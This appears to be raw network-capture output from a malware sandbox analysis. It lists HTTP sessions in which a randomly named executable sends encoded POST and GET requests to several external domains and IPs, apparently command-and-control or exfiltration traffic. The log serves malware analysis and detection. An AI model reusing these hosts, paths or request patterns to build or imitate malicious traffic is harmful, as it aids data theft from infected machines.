                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:42.621962070 CEST742OUTPOST /ypa3/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.komart.shop
                                                              Origin: http://www.komart.shop
                                                              Referer: http://www.komart.shop/ypa3/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4a 76 48 37 6c 68 6e 35 59 75 77 48 41 73 54 37 67 42 32 65 56 66 32 77 46 57 55 64 73 61 36 68 5a 63 61 39 38 71 51 55 7a 72 79 44 32 56 6a 48 4f 4c 4c 68 6c 6f 30 4b 33 33 55 32 58 53 64 4b 7a 57 35 76 56 6a 44 47 71 4c 47 36 66 32 52 69 34 68 2b 34 34 77 59 78 42 39 37 45 78 34 57 38 55 45 2b 56 72 67 50 34 76 38 57 38 30 71 46 6a 73 4b 62 63 35 37 39 51 38 2f 72 6f 41 54 42 76 64 4d 42 47 31 6c 77 63 55 56 37 46 4e 49 37 5a 56 67 53 53 38 44 71 2b 51 36 37 30 65 5a 30 61 2b 6b 74 67 64 61 79 6a 44 51 31 58 59 56 67 73 65 78 33 6c 47 32 79 47 6f 74 72 73 48 75 4b 64 2b 58 6f 48 68 38 32 69 55 70 76 4c 59 39 4d 67 41 49 4b 58 34 4a 4f 52 66 2b 6f 4d
                                                              Data Ascii: Ux_TPFo=JvH7lhn5YuwHAsT7gB2eVf2wFWUdsa6hZca98qQUzryD2VjHOLLhlo0K33U2XSdKzW5vVjDGqLG6f2Ri4h+44wYxB97Ex4W8UE+VrgP4v8W80qFjsKbc579Q8/roATBvdMBG1lwcUV7FNI7ZVgSS8Dq+Q670eZ0a+ktgdayjDQ1XYVgsex3lG2yGotrsHuKd+XoHh82iUpvLY9MgAIKX4JORf+oM
                                                              Sep 25, 2024 09:18:43.409024000 CEST668INHTTP/1.1 404 Not Found
                                                              content-encoding: gzip
                                                              content-type: text/html
                                                              date: Wed, 25 Sep 2024 07:18:43 GMT
                                                              etag: W/"66d6a4ca-2b5"
                                                              server: nginx
                                                              vary: Accept-Encoding
                                                              content-length: 454
                                                              connection: close
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                              Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              43192.168.2.849758133.130.35.90806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:45.164534092 CEST1759OUTPOST /ypa3/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.komart.shop
                                                              Origin: http://www.komart.shop
                                                              Referer: http://www.komart.shop/ypa3/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4a 76 48 37 6c 68 6e 35 59 75 77 48 41 73 54 37 67 42 32 65 56 66 32 77 46 57 55 64 73 61 36 68 5a 63 61 39 38 71 51 55 7a 71 4b 44 33 6e 37 48 4d 73 2f 68 6b 6f 30 4b 2b 58 55 33 58 53 64 74 7a 57 68 72 56 6a 50 57 71 4a 2b 36 51 30 70 69 39 51 2b 34 7a 77 59 78 63 74 37 46 38 59 58 6d 55 41 62 65 72 67 66 34 76 38 57 38 30 73 42 6a 70 72 62 63 2f 37 39 66 37 2f 72 6b 52 6a 41 34 64 4d 49 37 31 6c 30 69 58 6b 62 46 4e 6f 72 5a 55 56 4f 53 30 44 71 47 54 36 37 38 65 59 49 37 2b 69 4a 61 64 62 47 64 44 58 5a 58 62 43 42 4d 45 51 72 4f 45 6c 4b 35 67 4e 44 75 44 4f 65 59 37 30 6b 53 6c 4d 57 50 64 75 50 69 57 64 55 79 4b 61 44 55 70 2f 2b 46 50 49 35 59 33 4d 41 72 78 66 77 63 49 71 72 45 77 30 42 62 79 6e 44 4a 74 56 33 6c 5a 30 34 73 72 66 41 49 4d 73 35 68 41 4b 55 44 35 7a 73 49 6a 75 78 36 53 4d 66 73 75 33 61 49 50 4b 4d 33 57 52 79 63 77 56 71 78 39 42 52 33 36 62 64 36 63 39 77 35 33 58 36 69 6d 6f 59 4d 33 53 72 69 36 63 46 63 46 68 76 2b 68 42 79 31 61 4d 68 37 76 59 [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=JvH7lhn5YuwHAsT7gB2eVf2wFWUdsa6hZca98qQUzqKD3n7HMs/hko0K+XU3XSdtzWhrVjPWqJ+6Q0pi9Q+4zwYxct7F8YXmUAbergf4v8W80sBjprbc/79f7/rkRjA4dMI71l0iXkbFNorZUVOS0DqGT678eYI7+iJadbGdDXZXbCBMEQrOElK5gNDuDOeY70kSlMWPduPiWdUyKaDUp/+FPI5Y3MArxfwcIqrEw0BbynDJtV3lZ04srfAIMs5hAKUD5zsIjux6SMfsu3aIPKM3WRycwVqx9BR36bd6c9w53X6imoYM3Sri6cFcFhv+hBy1aMh7vYFxJ3FBX2LJTFOwneiJdlV02FxJ5lsgkdebjiJBfy3kQks/RwDaxIhPl2zIPtKAXrzfvY3Pee5SlbbHUvIRqZQwKpSbsrOKSbWpP3+FaXIM5ENvtIszExDalwosUCpK1UaWE2fWMWkDNN6eJa4p9ZvwRyiC5BaBAUulYhM79hFpCobInok6mq1wsJVQvLKXsQ6pxGJa9WigZT0g9jM+sLg0TQevx1Tp6URsHGAMfEBq6xGW9r2N5xh8YUpY3kiJceeCTBXxJwtIw2NgbNflHklR5J4Z0xNuLEZ+hilbfWF+kUvF7esyr9xTifjQ6Cu1b2aK7UQVqiR6/trJk6O/QZBTYTRq9NNsLQ/xvp8Ry+PM10gUiQdfbQ+zIwBdenaUHCWs+eHrdmB0+FfeqJo+b+fGV1Op+WAs6I1dEnY9fiQHIlrKREvLDmcIbTUFXDrx2DkT2DYfZJsW/QjKtDUmgWcBGlO/PBAOH9ezNDHm9+GHn2tZtwhNyg988Q9/haghIvamlAxHGfszgtnxldmIdzEfisHuIAHkEEoC8eQFgdegEv1HNc0w1Gsg6C4WehrOZGZI93osFjxzM4QOa98d5h1PlP7AUR1KqKL8jg2suuyVg7OJEE7gcvHRKlB3gaL35BtyvLvw2wHuK2h88sG52OxeEK3tCYID3ytN [TRUNCATED]
                                                              Sep 25, 2024 09:18:45.986351967 CEST668INHTTP/1.1 404 Not Found
                                                              content-encoding: gzip
                                                              content-type: text/html
                                                              date: Wed, 25 Sep 2024 07:18:45 GMT
                                                              etag: W/"66d6a4ca-2b5"
                                                              server: nginx
                                                              vary: Accept-Encoding
                                                              content-length: 454
                                                              connection: close
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                              Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              44192.168.2.849759133.130.35.90806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:47.816931963 CEST471OUTGET /ypa3/?Ux_TPFo=EtvbmXebZ+kERMHYn1m9SdOeKiFdq52bRf+Bnrg8mYDc8XPjIo/GtaNN4S1/Ry5wyE5veib2sb/FYFZZwx3N4jsKRZfkwZ7IXAzk/wTFocSMyqJij72Vua102dz6GHAwJQ==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.komart.shop
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:18:48.608295918 CEST883INHTTP/1.1 404 Not Found
                                                              content-type: text/html
                                                              date: Wed, 25 Sep 2024 07:18:48 GMT
                                                              etag: W/"66d6a4ca-2b5"
                                                              server: nginx
                                                              vary: Accept-Encoding
                                                              content-length: 693
                                                              connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              45192.168.2.84976052.223.13.41806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:53.895301104 CEST731OUTPOST /hvm1/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.timetime.store
                                                              Origin: http://www.timetime.store
                                                              Referer: http://www.timetime.store/hvm1/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4e 69 69 37 2f 31 66 54 7a 49 44 30 2f 50 62 48 48 46 47 55 6b 76 31 39 58 56 76 38 37 34 64 44 63 35 37 2f 76 36 32 6a 69 49 6b 69 72 41 33 76 71 78 31 53 2b 52 53 41 32 78 34 46 62 64 34 31 5a 2b 77 58 47 68 4e 55 74 53 31 59 62 33 38 6b 30 4c 37 6a 31 59 78 4f 52 31 6a 57 5a 66 48 48 67 63 68 55 39 34 6f 36 4d 55 43 37 78 77 79 32 76 35 73 6b 6c 52 6f 57 78 52 53 78 55 64 59 4e 34 4e 70 36 62 68 36 52 6c 62 4f 61 69 2f 73 77 43 69 43 38 4c 4f 2f 47 73 66 6c 74 33 4e 52 51 4d 68 77 63 6a 59 52 47 76 4e 41 31 68 58 45 4f 30 32 36 37 35 79 49 34 6d 6a 7a 5a 4d 63 78 46 66 7a 41 38 62 79 38 3d
                                                              Data Ascii: Ux_TPFo=Nii7/1fTzID0/PbHHFGUkv19XVv874dDc57/v62jiIkirA3vqx1S+RSA2x4Fbd41Z+wXGhNUtS1Yb38k0L7j1YxOR1jWZfHHgchU94o6MUC7xwy2v5sklRoWxRSxUdYN4Np6bh6RlbOai/swCiC8LO/Gsflt3NRQMhwcjYRGvNA1hXEO02675yI4mjzZMcxFfzA8by8=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              46192.168.2.84976152.223.13.41806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:56.445892096 CEST751OUTPOST /hvm1/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.timetime.store
                                                              Origin: http://www.timetime.store
                                                              Referer: http://www.timetime.store/hvm1/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4e 69 69 37 2f 31 66 54 7a 49 44 30 2f 71 54 48 55 55 47 55 6d 50 30 50 4a 46 76 38 78 59 64 48 63 35 33 2f 76 34 61 7a 33 73 49 69 71 6c 4c 76 72 7a 64 53 39 52 53 41 76 42 34 4d 44 39 34 38 5a 2b 73 31 47 6b 6c 55 74 53 68 59 62 79 59 6b 33 34 6a 69 7a 49 78 51 4b 6c 6a 55 55 2f 48 48 67 63 68 55 39 34 74 64 4d 55 4b 37 78 44 71 32 2b 74 59 6a 35 42 6f 4a 35 78 53 78 51 64 59 57 34 4e 6f 74 62 68 4c 47 6c 64 53 61 69 2b 63 77 43 7a 43 2f 53 2b 2f 41 6a 2f 6c 2b 35 6f 49 67 44 69 30 45 6f 36 63 67 67 4f 4d 79 67 68 70 6b 75 55 79 39 36 79 67 54 6d 67 62 76 4a 72 73 74 46 51 51 4d 46 6c 70 67 44 53 4a 63 43 79 38 2f 34 56 6e 79 58 38 4d 6d 66 58 6e 2b
                                                              Data Ascii: Ux_TPFo=Nii7/1fTzID0/qTHUUGUmP0PJFv8xYdHc53/v4az3sIiqlLvrzdS9RSAvB4MD948Z+s1GklUtShYbyYk34jizIxQKljUU/HHgchU94tdMUK7xDq2+tYj5BoJ5xSxQdYW4NotbhLGldSai+cwCzC/S+/Aj/l+5oIgDi0Eo6cggOMyghpkuUy96ygTmgbvJrstFQQMFlpgDSJcCy8/4VnyX8MmfXn+


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              47192.168.2.84976252.223.13.41806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:58.997534037 CEST1768OUTPOST /hvm1/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.timetime.store
                                                              Origin: http://www.timetime.store
                                                              Referer: http://www.timetime.store/hvm1/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4e 69 69 37 2f 31 66 54 7a 49 44 30 2f 71 54 48 55 55 47 55 6d 50 30 50 4a 46 76 38 78 59 64 48 63 35 33 2f 76 34 61 7a 33 74 63 69 72 58 54 76 71 53 64 53 38 52 53 41 77 78 34 4a 44 39 35 75 5a 2b 30 78 47 6b 67 6a 74 52 5a 59 62 55 55 6b 67 35 6a 69 39 49 78 51 56 31 6a 4a 5a 66 48 65 67 63 78 51 39 34 39 64 4d 55 4b 37 78 43 61 32 2b 35 73 6a 37 42 6f 57 78 52 53 48 55 64 5a 59 34 4e 77 39 62 6c 58 57 6c 75 4b 61 69 65 4d 77 4f 68 61 2f 62 2b 2f 43 6b 2f 6b 6a 35 6f 4d 2f 44 6d 73 79 6f 37 70 46 67 4f 30 79 74 32 70 39 38 30 69 72 37 7a 51 44 6d 79 75 4a 48 37 55 39 4c 7a 31 2f 46 6b 35 5a 4c 57 64 4e 4c 51 63 33 74 6e 6e 32 57 70 51 64 66 7a 43 6d 6c 55 36 54 36 61 4f 38 30 6c 78 61 2b 4f 42 6b 43 6c 70 43 41 33 37 4d 45 32 4b 63 65 6d 58 35 4b 48 43 51 4f 4e 69 58 43 32 52 6f 45 2b 70 4e 45 43 44 48 79 45 30 37 2f 6a 36 2b 2b 73 62 4b 68 30 57 34 4a 45 54 76 67 4c 4c 39 35 50 4b 4d 4b 34 6b 6a 35 32 74 47 75 70 45 6d 43 66 7a 6b 79 4f 4a 75 42 66 78 6e 32 48 68 45 6c 41 [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=Nii7/1fTzID0/qTHUUGUmP0PJFv8xYdHc53/v4az3tcirXTvqSdS8RSAwx4JD95uZ+0xGkgjtRZYbUUkg5ji9IxQV1jJZfHegcxQ949dMUK7xCa2+5sj7BoWxRSHUdZY4Nw9blXWluKaieMwOha/b+/Ck/kj5oM/Dmsyo7pFgO0yt2p980ir7zQDmyuJH7U9Lz1/Fk5ZLWdNLQc3tnn2WpQdfzCmlU6T6aO80lxa+OBkClpCA37ME2KcemX5KHCQONiXC2RoE+pNECDHyE07/j6++sbKh0W4JETvgLL95PKMK4kj52tGupEmCfzkyOJuBfxn2HhElAfh6BYgJ7tgvIGJ3ya8yNNM43ypMo38ogGigpdUz0hfJrxV+v8DEMiQL732zofnSzZgSM2hHJQdfnDgD6hLFq19Um+2dRu+Pc+8ShhfMnU075tQgqONuo/BPYwJnfPcSJnYS1lIUbtrL96agjdasQYVH9NkpLVMvdIo3oDQ7krUwTdcGhWY7rRoAzoS0BK+ptYReAxGGqlfNHuCJWGd02kVwA9e8VxUXgCJsfYHlQHTEba8aMcGudb/RaJVi0aamLMpDWzjmFuIHYJlU8xO2OXvKOKu/TJcDWcuBTm+4V12yxUhFW8s3fW1yvQY0WCR7e6fE3dcdfoA2Q+Px9/OqJLPDTlQdAUsV+J51vzSPjuCtXKMlefc9cMswCToCmdZGkdhiCN5pSER5f6WjWxbGd4bVoTlOz6Br3c8z279DngLzruDaYgaKQBgPd60gShMP3dQ3MhNb8vRMuIxR5in3K+bPa93h/lUvEzB13J/eHpN3jv2E85KpUDsvlLNv92Y41nX+JqwFe1g/kGQz3+p5t90Nkr0g9B+hHLdQ2Kh1Pont6Gd13wtNYUDFMu6pZqQ9q4srq3JgnHCz79L9USomQCR9bPzSpswUtPFhoTP4v6b0GparjlCcb+Ykqc+P15YpdooY4aZcqJjkETXzLitDtrZFQ6+rVSANXC6 [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              48192.168.2.84976352.223.13.41806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:19:01.538702965 CEST474OUTGET /hvm1/?FvypB=88kTDXb8k4dH&Ux_TPFo=AgKb8DW05IXx47rDIxe6k/I3elmL24Z8KJzJt46ewrw8hV7koCZq3nWDxRNTdr9dPMkLNwozkBBgf0Q4+Yfq/718ZCTBXcvSkJlRrZQnUmqO5QjtzKFYlQ011ieRBpIGng== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.timetime.store
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:19:02.053178072 CEST414INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 25 Sep 2024 07:19:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 274
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 76 79 70 42 3d 38 38 6b 54 44 58 62 38 6b 34 64 48 26 55 78 5f 54 50 46 6f 3d 41 67 4b 62 38 44 57 30 35 49 58 78 34 37 72 44 49 78 65 36 6b 2f 49 33 65 6c 6d 4c 32 34 5a 38 4b 4a 7a 4a 74 34 36 65 77 72 77 38 68 56 37 6b 6f 43 5a 71 33 6e 57 44 78 52 4e 54 64 72 39 64 50 4d 6b 4c 4e 77 6f 7a 6b 42 42 67 66 30 51 34 2b 59 66 71 2f 37 31 38 5a 43 54 42 58 63 76 53 6b 4a 6c 52 72 5a 51 6e 55 6d 71 4f 35 51 6a 74 7a 4b 46 59 6c 51 30 31 31 69 65 52 42 70 49 47 6e 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FvypB=88kTDXb8k4dH&Ux_TPFo=AgKb8DW05IXx47rDIxe6k/I3elmL24Z8KJzJt46ewrw8hV7koCZq3nWDxRNTdr9dPMkLNwozkBBgf0Q4+Yfq/718ZCTBXcvSkJlRrZQnUmqO5QjtzKFYlQ011ieRBpIGng=="}</script></head></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              49192.168.2.84976484.32.84.32806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:19:07.162679911 CEST734OUTPOST /we8s/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.agilizeimob.app
                                                              Origin: http://www.agilizeimob.app
                                                              Referer: http://www.agilizeimob.app/we8s/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4d 39 74 2f 6e 51 4d 50 65 2b 51 66 62 34 75 43 4d 75 74 6c 54 45 58 6a 4a 57 6d 68 4b 35 58 50 2b 4c 35 31 48 51 30 59 78 68 59 71 30 62 4f 68 6b 36 44 6e 63 34 35 34 50 39 74 50 55 4c 6c 43 53 51 4f 2b 36 4c 62 6c 48 53 61 78 4b 50 71 79 65 4c 66 2f 37 2f 47 6e 69 50 63 68 39 47 63 35 49 64 79 2f 37 56 6e 34 61 53 32 43 46 77 77 37 56 76 4b 73 50 66 39 4f 35 56 58 4d 2f 50 59 63 79 52 56 47 48 6c 73 4d 78 44 61 4b 32 39 4a 38 48 36 6f 35 58 55 70 34 44 34 2b 32 75 47 45 38 64 4f 50 39 79 2b 4a 34 41 6a 73 70 35 53 57 52 4d 48 31 53 76 32 7a 35 72 31 6b 2f 53 39 53 56 6c 47 57 72 4f 6e 30 3d
                                                              Data Ascii: Ux_TPFo=M9t/nQMPe+Qfb4uCMutlTEXjJWmhK5XP+L51HQ0YxhYq0bOhk6Dnc454P9tPULlCSQO+6LblHSaxKPqyeLf/7/GniPch9Gc5Idy/7Vn4aS2CFww7VvKsPf9O5VXM/PYcyRVGHlsMxDaK29J8H6o5XUp4D4+2uGE8dOP9y+J4Ajsp5SWRMH1Sv2z5r1k/S9SVlGWrOn0=


